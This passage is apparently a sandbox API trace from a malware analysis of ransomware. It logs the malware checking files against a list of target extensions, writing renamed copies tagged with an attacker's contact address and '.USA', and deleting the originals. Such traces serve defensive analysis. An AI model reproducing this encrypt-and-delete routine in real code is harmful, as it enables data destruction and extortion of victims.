hTemplateFile=0x0) returned 0x3ac [0272.193] GetFileSizeEx (in: hFile=0x3ac, lpFileSize=0x394ff1c | out: lpFileSize=0x394ff1c*=10104) returned 1 [0272.193] CloseHandle (hObject=0x3ac) returned 1 [0272.193] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\BHOINTL.DLL" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\bhointl.dll")) returned 0x20 [0272.193] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\BHOINTL.DLL.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\bhointl.dll.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0272.194] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\BHOINTL.DLL" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\bhointl.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0272.194] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\BHOINTL.DLL") returned 59 [0272.194] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\BHOINTL.DLL") returned 59 [0272.194] lstrlenW (lpString=".doc") returned 4 [0272.194] lstrcmpiW (lpString1=".doc", lpString2=".DLL") returned 1 [0272.194] lstrlenW (lpString=".docx") returned 5 [0272.194] lstrcmpiW (lpString1=".docx", lpString2="L.DLL") returned -1 [0272.194] lstrlenW (lpString=".pdf") returned 4 [0272.194] lstrcmpiW (lpString1=".pdf", lpString2=".DLL") returned 1 [0272.194] lstrlenW (lpString=".xls") returned 4 [0272.194] lstrcmpiW (lpString1=".xls", lpString2=".DLL") returned 1 [0272.194] lstrlenW (lpString=".xlsx") returned 5 [0272.194] lstrcmpiW (lpString1=".xlsx", lpString2="L.DLL") returned -1 [0272.194] lstrlenW (lpString=".ppt") returned 4 [0272.194] lstrcmpiW (lpString1=".ppt", lpString2=".DLL") returned 1 [0272.194] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\BHOINTL.DLL") returned 59 [0272.194] lstrlenW (lpString=".zip") returned 4 [0272.194] lstrcmpiW (lpString1=".zip", lpString2=".DLL") returned 1 [0272.194] lstrlenW (lpString=".rar") returned 4 [0272.194] lstrcmpiW (lpString1=".rar", lpString2=".DLL") returned 1 [0272.194] lstrlenW (lpString=".bz2") returned 4 [0272.194] lstrcmpiW (lpString1=".bz2", lpString2=".DLL") returned -1 [0272.194] lstrlenW (lpString=".7z") returned 3 [0272.194] lstrcmpiW (lpString1=".7z", lpString2="DLL") returned -1 [0272.194] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\BHOINTL.DLL") returned 59 [0272.195] lstrlenW (lpString=".dbf") returned 4 [0272.195] lstrcmpiW (lpString1=".dbf", lpString2=".DLL") returned -1 [0272.195] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\BHOINTL.DLL") returned 59 [0272.195] lstrlenW (lpString=".1cd") returned 4 [0272.195] lstrcmpiW (lpString1=".1cd", lpString2=".DLL") returned -1 [0272.195] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\BHOINTL.DLL") returned 59 [0272.195] lstrlenW (lpString=".jpg") returned 4 [0272.195] lstrcmpiW (lpString1=".jpg", lpString2=".DLL") returned 1 [0272.195] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\BHOINTL.DLL") returned 59 [0272.195] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\BHOINTL.DLL") returned 59 [0272.195] lstrlenW (lpString=".doc") returned 4 [0272.195] lstrcmpiW (lpString1=".doc", lpString2=".DLL") returned 1 [0272.195] lstrlenW (lpString=".docx") returned 5 [0272.195] lstrcmpiW (lpString1=".docx", lpString2="L.DLL") returned -1 [0272.195] lstrlenW (lpString=".pdf") returned 4 [0272.195] lstrcmpiW (lpString1=".pdf", lpString2=".DLL") returned 1 [0272.195] lstrlenW (lpString=".xls") returned 4 [0272.195] lstrcmpiW (lpString1=".xls", lpString2=".DLL") returned 1 [0272.195] lstrlenW (lpString=".xlsx") returned 5 [0272.195] lstrcmpiW (lpString1=".xlsx", lpString2="L.DLL") returned -1 [0272.195] lstrlenW (lpString=".ppt") returned 4 [0272.195] lstrcmpiW (lpString1=".ppt", lpString2=".DLL") returned 1 [0272.195] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\BHOINTL.DLL") returned 59 [0272.195] lstrlenW (lpString=".zip") returned 4 [0272.195] lstrcmpiW (lpString1=".zip", lpString2=".DLL") returned 1 [0272.195] lstrlenW (lpString=".rar") returned 4 [0272.195] lstrcmpiW (lpString1=".rar", lpString2=".DLL") returned 1 [0272.195] lstrlenW (lpString=".bz2") returned 4 [0272.195] lstrcmpiW (lpString1=".bz2", lpString2=".DLL") returned -1 [0272.195] lstrlenW (lpString=".7z") returned 3 [0272.195] lstrcmpiW (lpString1=".7z", lpString2="DLL") returned -1 [0272.195] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\BHOINTL.DLL") returned 59 [0272.196] lstrlenW (lpString=".dbf") returned 4 [0272.196] lstrcmpiW (lpString1=".dbf", lpString2=".DLL") returned -1 [0272.196] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\BHOINTL.DLL") returned 59 [0272.196] lstrlenW (lpString=".1cd") returned 4 [0272.196] lstrcmpiW (lpString1=".1cd", lpString2=".DLL") returned -1 [0272.196] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\BHOINTL.DLL") returned 59 [0272.196] lstrlenW (lpString=".jpg") returned 4 [0272.196] lstrcmpiW (lpString1=".jpg", lpString2=".DLL") returned 1 [0272.196] lstrcmpiW (lpString1=".VSL", lpString2=".USA") returned 1 [0272.196] lstrlenW (lpString="BSTORM.VSL") returned 10 [0272.196] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\BSTORM.VSL" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\bstorm.vsl"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3ac [0272.198] GetFileSizeEx (in: hFile=0x3ac, lpFileSize=0x394ff1c | out: lpFileSize=0x394ff1c*=45968) returned 1 [0272.198] CloseHandle (hObject=0x3ac) returned 1 [0272.198] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\BSTORM.VSL" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\bstorm.vsl")) returned 0x20 [0272.198] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\BSTORM.VSL.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\bstorm.vsl.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0272.198] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\BSTORM.VSL" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\bstorm.vsl"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3ac [0272.199] SetFilePointerEx (in: hFile=0x3ac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x394fec8 | out: lpNewFilePointer=0x0) returned 1 [0272.199] SetFilePointerEx (in: hFile=0x3ac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x394fec8 | out: lpNewFilePointer=0x0) returned 1 [0272.199] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\BSTORM.VSL.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\bstorm.vsl.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x328 [0272.199] GetLastError () returned 0x0 [0272.199] ReadFile (in: hFile=0x3ac, lpBuffer=0x3f00020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x394fed4, lpOverlapped=0x0 | out: lpBuffer=0x3f00020*, lpNumberOfBytesRead=0x394fed4*=0xb390, lpOverlapped=0x0) returned 1 [0272.201] WriteFile (in: hFile=0x328, lpBuffer=0x3f00020*, nNumberOfBytesToWrite=0xb3a0, lpNumberOfBytesWritten=0x394fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3f00020*, lpNumberOfBytesWritten=0x394fc9c*=0xb3a0, lpOverlapped=0x0) returned 1 [0272.203] ReadFile (in: hFile=0x3ac, lpBuffer=0x3f00020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x394fed4, lpOverlapped=0x0 | out: lpBuffer=0x3f00020*, lpNumberOfBytesRead=0x394fed4*=0x0, lpOverlapped=0x0) returned 1 [0272.203] WriteFile (in: hFile=0x328, lpBuffer=0x3f00020*, nNumberOfBytesToWrite=0xe8, lpNumberOfBytesWritten=0x394fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3f00020*, lpNumberOfBytesWritten=0x394fc9c*=0xe8, lpOverlapped=0x0) returned 1 [0272.203] SetEndOfFile (hFile=0x328) returned 1 [0272.204] CloseHandle (hObject=0x328) returned 1 [0272.205] SetFilePointerEx (in: hFile=0x3ac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x394fec8 | out: lpNewFilePointer=0x0) returned 1 [0272.205] SetEndOfFile (hFile=0x3ac) returned 1 [0272.207] CloseHandle (hObject=0x3ac) returned 1 [0272.208] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\BSTORM.VSL.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x20) returned 1 [0272.208] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\BSTORM.VSL" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\bstorm.vsl")) returned 1 [0272.208] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\BSTORM.VSL") returned 58 [0272.208] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\BSTORM.VSL") returned 58 [0272.208] lstrlenW (lpString=".doc") returned 4 [0272.208] lstrcmpiW (lpString1=".doc", lpString2=".VSL") returned -1 [0272.208] lstrlenW (lpString=".docx") returned 5 [0272.208] lstrcmpiW (lpString1=".docx", lpString2="M.VSL") returned -1 [0272.208] lstrlenW (lpString=".pdf") returned 4 [0272.208] lstrcmpiW (lpString1=".pdf", lpString2=".VSL") returned -1 [0272.208] lstrlenW (lpString=".xls") returned 4 [0272.208] lstrcmpiW (lpString1=".xls", lpString2=".VSL") returned 1 [0272.208] lstrlenW (lpString=".xlsx") returned 5 [0272.208] lstrcmpiW (lpString1=".xlsx", lpString2="M.VSL") returned -1 [0272.208] lstrlenW (lpString=".ppt") returned 4 [0272.208] lstrcmpiW (lpString1=".ppt", lpString2=".VSL") returned -1 [0272.208] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\BSTORM.VSL") returned 58 [0272.208] lstrlenW (lpString=".zip") returned 4 [0272.208] lstrcmpiW (lpString1=".zip", lpString2=".VSL") returned 1 [0272.208] lstrlenW (lpString=".rar") returned 4 [0272.208] lstrcmpiW (lpString1=".rar", lpString2=".VSL") returned -1 [0272.208] lstrlenW (lpString=".bz2") returned 4 [0272.208] lstrcmpiW (lpString1=".bz2", lpString2=".VSL") returned -1 [0272.208] lstrlenW (lpString=".7z") returned 3 [0272.208] lstrcmpiW (lpString1=".7z", lpString2="VSL") returned -1 [0272.209] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\BSTORM.VSL") returned 58 [0272.209] lstrlenW (lpString=".dbf") returned 4 [0272.209] lstrcmpiW (lpString1=".dbf", lpString2=".VSL") returned -1 [0272.209] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\BSTORM.VSL") returned 58 [0272.209] lstrlenW (lpString=".1cd") returned 4 [0272.209] lstrcmpiW (lpString1=".1cd", lpString2=".VSL") returned -1 [0272.209] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\BSTORM.VSL") returned 58 [0272.209] lstrlenW (lpString=".jpg") returned 4 [0272.209] lstrcmpiW (lpString1=".jpg", lpString2=".VSL") returned -1 [0272.209] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\BSTORM.VSL") returned 58 [0272.209] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\BSTORM.VSL") returned 58 [0272.209] lstrlenW (lpString=".doc") returned 4 [0272.209] lstrcmpiW (lpString1=".doc", lpString2=".VSL") returned -1 [0272.209] lstrlenW (lpString=".docx") returned 5 [0272.209] lstrcmpiW (lpString1=".docx", lpString2="M.VSL") returned -1 [0272.209] lstrlenW (lpString=".pdf") returned 4 [0272.209] lstrcmpiW (lpString1=".pdf", lpString2=".VSL") returned -1 [0272.209] lstrlenW (lpString=".xls") returned 4 [0272.209] lstrcmpiW (lpString1=".xls", lpString2=".VSL") returned 1 [0272.209] lstrlenW (lpString=".xlsx") returned 5 [0272.209] lstrcmpiW (lpString1=".xlsx", lpString2="M.VSL") returned -1 [0272.209] lstrlenW (lpString=".ppt") returned 4 [0272.209] lstrcmpiW (lpString1=".ppt", lpString2=".VSL") returned -1 [0272.209] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\BSTORM.VSL") returned 58 [0272.209] lstrlenW (lpString=".zip") returned 4 [0272.209] lstrcmpiW (lpString1=".zip", lpString2=".VSL") returned 1 [0272.209] lstrlenW (lpString=".rar") returned 4 [0272.209] lstrcmpiW (lpString1=".rar", lpString2=".VSL") returned -1 [0272.209] lstrlenW (lpString=".bz2") returned 4 [0272.209] lstrcmpiW (lpString1=".bz2", lpString2=".VSL") returned -1 [0272.210] lstrlenW (lpString=".7z") returned 3 [0272.210] lstrcmpiW (lpString1=".7z", lpString2="VSL") returned -1 [0272.210] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\BSTORM.VSL") returned 58 [0272.210] lstrlenW (lpString=".dbf") returned 4 [0272.210] lstrcmpiW (lpString1=".dbf", lpString2=".VSL") returned -1 [0272.210] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\BSTORM.VSL") returned 58 [0272.210] lstrlenW (lpString=".1cd") returned 4 [0272.210] lstrcmpiW (lpString1=".1cd", lpString2=".VSL") returned -1 [0272.210] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\BSTORM.VSL") returned 58 [0272.210] lstrlenW (lpString=".jpg") returned 4 [0272.210] lstrcmpiW (lpString1=".jpg", lpString2=".VSL") returned -1 [0272.210] lstrcmpiW (lpString1=".VRD", lpString2=".USA") returned 1 [0272.210] lstrlenW (lpString="CALEVENT.VRD") returned 12 [0272.210] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\CALEVENT.VRD" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\calevent.vrd"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3ac [0272.211] GetFileSizeEx (in: hFile=0x3ac, lpFileSize=0x394ff1c | out: lpFileSize=0x394ff1c*=2144) returned 1 [0272.211] CloseHandle (hObject=0x3ac) returned 1 [0272.211] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\CALEVENT.VRD" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\calevent.vrd")) returned 0x20 [0272.211] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\CALEVENT.VRD.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\calevent.vrd.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0272.211] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\CALEVENT.VRD" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\calevent.vrd"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3ac [0272.211] SetFilePointerEx (in: hFile=0x3ac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x394fec8 | out: lpNewFilePointer=0x0) returned 1 [0272.211] SetFilePointerEx (in: hFile=0x3ac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x394fec8 | out: lpNewFilePointer=0x0) returned 1 [0272.211] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\CALEVENT.VRD.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\calevent.vrd.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x328 [0272.212] GetLastError () returned 0x0 [0272.212] ReadFile (in: hFile=0x3ac, lpBuffer=0x3f00020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x394fed4, lpOverlapped=0x0 | out: lpBuffer=0x3f00020*, lpNumberOfBytesRead=0x394fed4*=0x860, lpOverlapped=0x0) returned 1 [0272.213] WriteFile (in: hFile=0x328, lpBuffer=0x3f00020*, nNumberOfBytesToWrite=0x870, lpNumberOfBytesWritten=0x394fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3f00020*, lpNumberOfBytesWritten=0x394fc9c*=0x870, lpOverlapped=0x0) returned 1 [0272.214] ReadFile (in: hFile=0x3ac, lpBuffer=0x3f00020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x394fed4, lpOverlapped=0x0 | out: lpBuffer=0x3f00020*, lpNumberOfBytesRead=0x394fed4*=0x0, lpOverlapped=0x0) returned 1 [0272.214] WriteFile (in: hFile=0x328, lpBuffer=0x3f00020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x394fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3f00020*, lpNumberOfBytesWritten=0x394fc9c*=0xec, lpOverlapped=0x0) returned 1 [0272.214] SetEndOfFile (hFile=0x328) returned 1 [0272.214] CloseHandle (hObject=0x328) returned 1 [0272.214] SetFilePointerEx (in: hFile=0x3ac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x394fec8 | out: lpNewFilePointer=0x0) returned 1 [0272.214] SetEndOfFile (hFile=0x3ac) returned 1 [0272.216] CloseHandle (hObject=0x3ac) returned 1 [0272.216] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\CALEVENT.VRD.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x20) returned 1 [0272.216] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\CALEVENT.VRD" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\calevent.vrd")) returned 1 [0272.216] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\CALEVENT.VRD") returned 60 [0272.216] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\CALEVENT.VRD") returned 60 [0272.216] lstrlenW (lpString=".doc") returned 4 [0272.216] lstrcmpiW (lpString1=".doc", lpString2=".VRD") returned -1 [0272.216] lstrlenW (lpString=".docx") returned 5 [0272.216] lstrcmpiW (lpString1=".docx", lpString2="T.VRD") returned -1 [0272.216] lstrlenW (lpString=".pdf") returned 4 [0272.217] lstrcmpiW (lpString1=".pdf", lpString2=".VRD") returned -1 [0272.217] lstrlenW (lpString=".xls") returned 4 [0272.217] lstrcmpiW (lpString1=".xls", lpString2=".VRD") returned 1 [0272.217] lstrlenW (lpString=".xlsx") returned 5 [0272.217] lstrcmpiW (lpString1=".xlsx", lpString2="T.VRD") returned -1 [0272.217] lstrlenW (lpString=".ppt") returned 4 [0272.217] lstrcmpiW (lpString1=".ppt", lpString2=".VRD") returned -1 [0272.217] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\CALEVENT.VRD") returned 60 [0272.217] lstrlenW (lpString=".zip") returned 4 [0272.217] lstrcmpiW (lpString1=".zip", lpString2=".VRD") returned 1 [0272.217] lstrlenW (lpString=".rar") returned 4 [0272.217] lstrcmpiW (lpString1=".rar", lpString2=".VRD") returned -1 [0272.217] lstrlenW (lpString=".bz2") returned 4 [0272.217] lstrcmpiW (lpString1=".bz2", lpString2=".VRD") returned -1 [0272.217] lstrlenW (lpString=".7z") returned 3 [0272.217] lstrcmpiW (lpString1=".7z", lpString2="VRD") returned -1 [0272.217] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\CALEVENT.VRD") returned 60 [0272.217] lstrlenW (lpString=".dbf") returned 4 [0272.217] lstrcmpiW (lpString1=".dbf", lpString2=".VRD") returned -1 [0272.217] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\CALEVENT.VRD") returned 60 [0272.217] lstrlenW (lpString=".1cd") returned 4 [0272.217] lstrcmpiW (lpString1=".1cd", lpString2=".VRD") returned -1 [0272.217] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\CALEVENT.VRD") returned 60 [0272.217] lstrlenW (lpString=".jpg") returned 4 [0272.217] lstrcmpiW (lpString1=".jpg", lpString2=".VRD") returned -1 [0272.217] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\CALEVENT.VRD") returned 60 [0272.217] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\CALEVENT.VRD") returned 60 [0272.217] lstrlenW (lpString=".doc") returned 4 [0272.217] lstrcmpiW (lpString1=".doc", lpString2=".VRD") returned -1 [0272.217] lstrlenW (lpString=".docx") returned 5 [0272.217] lstrcmpiW (lpString1=".docx", lpString2="T.VRD") returned -1 [0272.217] lstrlenW (lpString=".pdf") returned 4 [0272.218] lstrcmpiW (lpString1=".pdf", lpString2=".VRD") returned -1 [0272.218] lstrlenW (lpString=".xls") returned 4 [0272.218] lstrcmpiW (lpString1=".xls", lpString2=".VRD") returned 1 [0272.218] lstrlenW (lpString=".xlsx") returned 5 [0272.218] lstrcmpiW (lpString1=".xlsx", lpString2="T.VRD") returned -1 [0272.218] lstrlenW (lpString=".ppt") returned 4 [0272.218] lstrcmpiW (lpString1=".ppt", lpString2=".VRD") returned -1 [0272.218] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\CALEVENT.VRD") returned 60 [0272.218] lstrlenW (lpString=".zip") returned 4 [0272.218] lstrcmpiW (lpString1=".zip", lpString2=".VRD") returned 1 [0272.218] lstrlenW (lpString=".rar") returned 4 [0272.218] lstrcmpiW (lpString1=".rar", lpString2=".VRD") returned -1 [0272.218] lstrlenW (lpString=".bz2") returned 4 [0272.218] lstrcmpiW (lpString1=".bz2", lpString2=".VRD") returned -1 [0272.218] lstrlenW (lpString=".7z") returned 3 [0272.218] lstrcmpiW (lpString1=".7z", lpString2="VRD") returned -1 [0272.218] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\CALEVENT.VRD") returned 60 [0272.218] lstrlenW (lpString=".dbf") returned 4 [0272.218] lstrcmpiW (lpString1=".dbf", lpString2=".VRD") returned -1 [0272.218] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\CALEVENT.VRD") returned 60 [0272.218] lstrlenW (lpString=".1cd") returned 4 [0272.218] lstrcmpiW (lpString1=".1cd", lpString2=".VRD") returned -1 [0272.218] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\CALEVENT.VRD") returned 60 [0272.218] lstrlenW (lpString=".jpg") returned 4 [0272.218] lstrcmpiW (lpString1=".jpg", lpString2=".VRD") returned -1 [0272.218] lstrcmpiW (lpString1=".DLL", lpString2=".USA") returned -1 [0272.218] lstrlenW (lpString="CERTINTL.DLL") returned 12 [0272.219] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\CERTINTL.DLL" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\certintl.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3ac [0272.219] GetFileSizeEx (in: hFile=0x3ac, lpFileSize=0x394ff1c | out: lpFileSize=0x394ff1c*=12176) returned 1 [0272.219] CloseHandle (hObject=0x3ac) returned 1 [0272.219] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\CERTINTL.DLL" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\certintl.dll")) returned 0x20 [0272.219] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\CERTINTL.DLL.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\certintl.dll.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0272.219] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\CERTINTL.DLL" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\certintl.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0272.219] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\CERTINTL.DLL") returned 60 [0272.219] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\CERTINTL.DLL") returned 60 [0272.219] lstrlenW (lpString=".doc") returned 4 [0272.219] lstrcmpiW (lpString1=".doc", lpString2=".DLL") returned 1 [0272.219] lstrlenW (lpString=".docx") returned 5 [0272.219] lstrcmpiW (lpString1=".docx", lpString2="L.DLL") returned -1 [0272.219] lstrlenW (lpString=".pdf") returned 4 [0272.219] lstrcmpiW (lpString1=".pdf", lpString2=".DLL") returned 1 [0272.219] lstrlenW (lpString=".xls") returned 4 [0272.219] lstrcmpiW (lpString1=".xls", lpString2=".DLL") returned 1 [0272.219] lstrlenW (lpString=".xlsx") returned 5 [0272.219] lstrcmpiW (lpString1=".xlsx", lpString2="L.DLL") returned -1 [0272.219] lstrlenW (lpString=".ppt") returned 4 [0272.220] lstrcmpiW (lpString1=".ppt", lpString2=".DLL") returned 1 [0272.220] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\CERTINTL.DLL") returned 60 [0272.220] lstrlenW (lpString=".zip") returned 4 [0272.220] lstrcmpiW (lpString1=".zip", lpString2=".DLL") returned 1 [0272.220] lstrlenW (lpString=".rar") returned 4 [0272.220] lstrcmpiW (lpString1=".rar", lpString2=".DLL") returned 1 [0272.220] lstrlenW (lpString=".bz2") returned 4 [0272.220] lstrcmpiW (lpString1=".bz2", lpString2=".DLL") returned -1 [0272.220] lstrlenW (lpString=".7z") returned 3 [0272.220] lstrcmpiW (lpString1=".7z", lpString2="DLL") returned -1 [0272.220] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\CERTINTL.DLL") returned 60 [0272.220] lstrlenW (lpString=".dbf") returned 4 [0272.220] lstrcmpiW (lpString1=".dbf", lpString2=".DLL") returned -1 [0272.220] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\CERTINTL.DLL") returned 60 [0272.220] lstrlenW (lpString=".1cd") returned 4 [0272.220] lstrcmpiW (lpString1=".1cd", lpString2=".DLL") returned -1 [0272.220] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\CERTINTL.DLL") returned 60 [0272.220] lstrlenW (lpString=".jpg") returned 4 [0272.220] lstrcmpiW (lpString1=".jpg", lpString2=".DLL") returned 1 [0272.220] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\CERTINTL.DLL") returned 60 [0272.220] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\CERTINTL.DLL") returned 60 [0272.220] lstrlenW (lpString=".doc") returned 4 [0272.220] lstrcmpiW (lpString1=".doc", lpString2=".DLL") returned 1 [0272.220] lstrlenW (lpString=".docx") returned 5 [0272.220] lstrcmpiW (lpString1=".docx", lpString2="L.DLL") returned -1 [0272.220] lstrlenW (lpString=".pdf") returned 4 [0272.220] lstrcmpiW (lpString1=".pdf", lpString2=".DLL") returned 1 [0272.220] lstrlenW (lpString=".xls") returned 4 [0272.220] lstrcmpiW (lpString1=".xls", lpString2=".DLL") returned 1 [0272.220] lstrlenW (lpString=".xlsx") returned 5 [0272.220] lstrcmpiW (lpString1=".xlsx", lpString2="L.DLL") returned -1 [0272.220] lstrlenW (lpString=".ppt") returned 4 